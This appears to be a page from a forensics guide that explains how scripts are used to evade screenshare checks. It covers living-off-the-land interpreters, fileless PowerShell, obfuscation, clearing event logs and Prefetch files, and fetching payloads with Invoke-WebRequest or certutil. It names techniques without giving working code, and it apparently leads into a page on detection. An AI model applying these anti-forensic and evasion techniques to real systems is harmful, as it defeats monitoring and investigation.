Mechanisms of Evasion

  • Living-off-the-Land (LotL): Scripts run using trusted, built-in Windows interpreters (powershell.exe, cmd.exe, cscript.exe/wscript.exe for VBS, mshta.exe for HTA) or commonly installed ones (python.exe, AutoIt3.exe). Since the interpreters are legitimate, their execution is less likely to be immediately flagged by basic AV compared to a completely unknown .exe.

  • Fileless Execution (PowerShell Focus): PowerShell is particularly potent because it allows code (cmdlets, scripts) to be downloaded and executed directly in memory without ever touching the disk. Encoded commands can be passed via the command line (powershell.exe -EncodedCommand ...), minimizing disk artifacts.

  • Obfuscation: Scripts are text-based and easily obfuscated. Techniques include:

    • Encoding (Base64 is common in PowerShell).

    • Character substitution/concatenation.

    • Breaking logic into many small, confusingly named functions.

    • Adding junk code or comments. This hinders static analysis (reading the script code) and simple string searches.

  • Automation of Malicious Tasks: Scripts excel at automating sequences of actions relevant to bypassing screenshares, such as:

    • Disabling security services or specific logging mechanisms (e.g., stopping SysMain, clearing Event Logs via wevtutil).

    • Deleting specific files or artifacts (e.g., Prefetch files, browser history, cheat logs, registry keys via reg delete).

    • Modifying system settings (e.g., changing file attributes, registry policies).

    • Downloading and executing secondary payloads (e.g., using PowerShell's Invoke-WebRequest or certutil.exe called from a script).

  • Interaction with System Components: Scripts can directly interact with powerful system interfaces:

    • Windows APIs (via PowerShell's .NET integration or specific COM objects).

    • Windows Management Instrumentation (WMI) for system queries, configuration changes, or remote execution.

    • COM Objects for interacting with various applications and system components.

    • .NET Framework for complex operations, memory manipulation, or loading assemblies.

  • HTA Exploitation: HTML Applications (.hta files executed by mshta.exe) run embedded scripts (VBScript, JScript) outside the browser sandbox, often with higher privileges, allowing direct system interaction. Can be used as loaders delivered via web or email.

  • AutoIt Automation: AutoIt is a legitimate scripting language for Windows GUI automation. Attackers misuse it to create sophisticated macros, autoclickers, or bots that simulate user input. Compiled AutoIt scripts (.exe) can sometimes be harder to reverse-engineer than plain text scripts.

PreviousFileless Malware and Living-off-the-Land Binaries (LOLBins)NextForensic Implications and Detection

Last updated